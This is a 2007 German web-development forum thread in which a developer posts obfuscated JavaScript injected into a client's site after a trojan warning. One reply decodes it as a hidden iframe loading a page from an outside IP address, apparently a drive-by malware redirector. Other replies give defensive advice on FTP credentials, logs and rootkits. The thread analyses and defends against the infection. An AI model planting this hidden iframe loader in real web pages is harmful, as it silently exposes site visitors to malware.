php-resource



Zurück   PHP-Scripte PHP-Tutorials PHP-Jobs und vieles mehr > Entwicklung > HTML, JavaScript, AJAX, jQuery, CSS, Bootstrap, LESS
 

Login

 
eingeloggt bleiben
star Jetzt registrieren   star Passwort vergessen
 

 

 


HTML, JavaScript, AJAX, jQuery, CSS, Bootstrap, LESS Probleme mit HTML5, Bootstrap oder jQuery ?

Antwort
 
LinkBack Themen-Optionen Bewertung: Bewertung: 1 Stimmen, 5,00 durchschnittlich.
  #1 (permalink)  
Alt 12-12-2007, 17:27
Breezzer
 Registrierter Benutzer
Links : Onlinestatus : Breezzer ist offline
Registriert seit: Nov 2005
Beiträge: 98
Breezzer ist zur Zeit noch ein unbeschriebenes Blatt
Standard Website "hacken" ?

vorweg eine anmerkung. ich habe dieses thema in diesem unterforum eröffnet, weil ich a) befürchte, dass es im It-Security - Forum niemand lesen würde und b) weil es ja durchaus etwas mit einem (Java)Script zu tun hat

Hallo zusammen,

ich bekam heute die erschreckende mitteilung eines kunden, er würde bei besuch seiner, von uns erstellten, website eine trojaner-warnung erhalten.
ein kurzer blick in den quellcode der index-datei brachte de vermutlichen bösewicht hervor:

Code:
<iframe src='http://url' width='1' height='1' style='visibility: hidden;'></iframe>
<script>
function v475ee5388da72(v475ee5388ef2d)
{
 function v475ee5389166b () 
{return 16;} 

return(parseInt(v475ee5388ef2d,v475ee5389166b()));
}
function v475ee53897041(v475ee53897cfe)
{ 
 var v475ee53898157='';
for(v475ee5389838f=0; v475ee5389838f<v475ee53897cfe.length; v475ee5389838f+=2)
{ 
v475ee53898157+=(String.fromCharCode(v475ee5388da72(v475ee53897cfe.substr(v475ee5389838f, 2))));
}
return v475ee53898157;
}
 document.write(v475ee53897041('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D386335303738207372633D5C27687474703A2F2F37372E3232312E3133332E3138382F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A313035383835292B273435623238396131385C272077696474683D353433206865696768743D313935207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E'));</script>
dieser code stand direkt nach dem body-tag der website und hatte dort nichts zu suchen.


deshalb habe ich zwei fragen:
1. was bedeutet dieser schicke code?
2. wie gelangt er auf die website? zugriff über den server schließe ich mal aus, sonst wären wohl mehr daten hinüber


freundliche grüße
breezzer
Mit Zitat antworten
  #2 (permalink)  
Alt 12-12-2007, 17:41
ministry
 PHP Junior
Links : Onlinestatus : ministry ist offline
Registriert seit: Jun 2006
Ort: KI / KA
Beiträge: 965
ministry ist zur Zeit noch ein unbeschriebenes Blatt
Standard

1. Er bindet folgenden Code in die Webseite ein:

Code:
<SCRIPT>window.status='Done';
document.write('<iframe name=8c5078 src=\'http://77.221.133.188/.if/go.html?'
+Math.round(Math.random()*105885)+'45b289a18\' 
width=543 height=195 style=\'display: none\'>
</iframe>')</SCRIPT>
Mit anderen Worten, er ruft einen fremden Iframe auf.

2. Wohl durch nicht geprüfte Benutzereingaben.
__________________
ich glaube
Mit Zitat antworten
  #3 (permalink)  
Alt 12-12-2007, 17:41
XGremliN
 PHP Senior
Links : Onlinestatus : XGremliN ist offline
Registriert seit: Sep 2003
Ort: Karl-Marx-Stadt
Beiträge: 1.900
XGremliN ist zur Zeit noch ein unbeschriebenes Blatt
Standard

1. dieser schicke Code wurde durch Verschleierung unleserlich gemacht.
2. wenn jemand auf deinen Server gekommen wäre müssen deine Daten doch nicht hinüber sein. Es ist viel effiktiver einen Server zu hacken und den als Zombie zu missbrauchen, um auf weitere Server zu kommen.
3. was macht denn der Code, wenn du ihn ausführst?
4. auf jeden Fall die Zugangsdaten zum Server, DB etc. ändern
__________________
it's not a bug,
it's a feature!
Mit Zitat antworten
  #4 (permalink)  
Alt 12-12-2007, 17:43
Kropff
  Administrator
Links : Onlinestatus : Kropff ist offline
Registriert seit: Mar 2002
Ort: Köln
Beiträge: 11.722
Kropff befindet sich auf einem aufstrebenden Ast
Standard

OffTopic:
mal wieder die russen am werk?


gruß
peter
__________________
Nukular, das Wort ist N-u-k-u-l-a-r (Homer Simpson)
Meine Seite
Mit Zitat antworten
  #5 (permalink)  
Alt 13-12-2007, 11:38
Breezzer
 Registrierter Benutzer
Links : Onlinestatus : Breezzer ist offline
Registriert seit: Nov 2005
Beiträge: 98
Breezzer ist zur Zeit noch ein unbeschriebenes Blatt
Standard

vielen dank für die zahlreichen und kompetenten antworten

ich habe den code jetzt noch in vielen anderen projekten auf dem selben server gefunden.
das seltsame ist aber, dass bei den meisten keine user-eingaben gemacht werden können, sprich es gibt kein gästebuch,kontaktformular, userprofil, etc.

aber auch bei den seiten mit gästebuch o.ä. verstehe ich nicht, wie ein fremder code in den quelltext schreiben kann. wie funktioniert sowas und wie kann man sich effektiv dagegen schützen?

mfg
breezzer
Mit Zitat antworten
  #6 (permalink)  
Alt 13-12-2007, 12:05
pekka
 PHP Master
Links : Onlinestatus : pekka ist offline
Registriert seit: Jun 2001
Ort: Köln
Beiträge: 6.608
pekka befindet sich auf einem aufstrebenden Ast
Standard

Entweder ein unsicheres PHP-Skript wurde gehackt, und hat Zugriff auf dein Dateisystem erhalten. Dagegen spricht aber, daß auch andere Projekte betroffen sind: Wenn der Server ordentlich konfiguriert ist, dürfte ein gehacktes PHP-Skript an diese nicht rangekommen sein.

Im Schlimmsten Fall ist ein FTP-Login unsicher.
Ich würde:
- 1. Falls vorhanden lokale Versionen der Seiten checken, ob die bereits betroffen sind
- 2. Falls ja (unwahrscheinlich), liegt das Problem bei Dir; Ansonsten
- 3. Sofort alle FTP-Zugänge ändern / deaktivieren
- 4. Den Provider um FTP-Logs bitten, falls vorhanden, und auf ungewöhliche IP-Adressen abchecken
- 5. Alle Passwörter und sonstigen Interna, die jemand mit FTP-Zugriff eingesehen haben könnte, ändern. ALso auch Datenbankdaten in Skripten und Passwörter in den Datenbanken, an die man mit den Daten reinkommen hätte können, und so weiter.
- 6. Die Lücke klären. Direkter Hack oder ausgespähtes / weitergegebenes Passwort?

Geändert von pekka (13-12-2007 um 12:08 Uhr)
Mit Zitat antworten
  #7 (permalink)  
Alt 13-12-2007, 22:10
sysop123
 Registrierter Benutzer
Links : Onlinestatus : sysop123 ist offline
Registriert seit: Aug 2006
Beiträge: 77
sysop123 ist zur Zeit noch ein unbeschriebenes Blatt
Standard

mir fällt dann noch ein rootkits suchen (kann nur der admin des servers), und den provider quietschen bis es kracht, eventuell wechseln
Mit Zitat antworten
Antwort

Lesezeichen


Aktive Benutzer in diesem Thema: 1 (Registrierte Benutzer: 0, Gäste: 1)
 

Themen-Optionen
Thema bewerten
Thema bewerten:

Forumregeln
Es ist Ihnen nicht erlaubt, neue Themen zu verfassen.
Es ist Ihnen nicht erlaubt, auf Beiträge zu antworten.
Es ist Ihnen nicht erlaubt, Anhänge hochzuladen.
Es ist Ihnen nicht erlaubt, Ihre Beiträge zu bearbeiten.

BB-Code ist an.
Smileys sind an.
[IMG] Code ist an.
HTML-Code ist aus.
Trackbacks are an
Pingbacks are an
Refbacks are an


PHP News

ebiz-trader 7.5.0 mit PHP7 Unterstützung veröffentlicht
ebiz-trader 7.5.0 mit PHP7 Unterstützung veröffentlichtDie bekannte Marktplatzsoftware ebiz-trader ist in der Version 7.5.0 veröffentlicht worden.

28.05.2018 | Berni

Wissensbestand in Unternehmen
Wissensbestand in UnternehmenLebenslanges Lernen und Weiterbilden sichert Wissensbestand in Unternehmen

25.05.2018 | Berni


 

Aktuelle PHP Scripte

PHP Server Monitor

PHP Server Monitor ist ein Skript, das prüft, ob Ihre Websites und Server betriebsbereit sind.

11.09.2018 Berni | Kategorie: PHP/ Security
PHP WEB STATISTIK ansehen PHP WEB STATISTIK

Die PHP Web Statistik bietet Ihnen ein einfach zu konfigurierendes Script zur Aufzeichnung und grafischen und textuellen Auswertung der Besuchern Ihrer Webseite. Folgende zeitlichen Module sind verfügbar: Jahr, Monat, Tag, Wochentag, Stunde Folgende son

28.08.2018 phpwebstat | Kategorie: PHP/ Counter
Affilinator - Affilinet XML Produktlisten Skript

Die Affilinator Affilinet XML Edition ist ein vollautomatisches Skript zum einlesen und darstellen der Affili.net (Partnerprogramm Netzwerk) Produktlisten und Produktdaten. Im Grunde gibt der Webmaster seine Affilinet PartnerID ein und hat dann unmittelb

27.08.2018 freefrank@ | Kategorie: PHP/ Partnerprogramme
 Alle PHP Scripte anzeigen

Alle Zeitangaben in WEZ +2. Es ist jetzt 01:14 Uhr.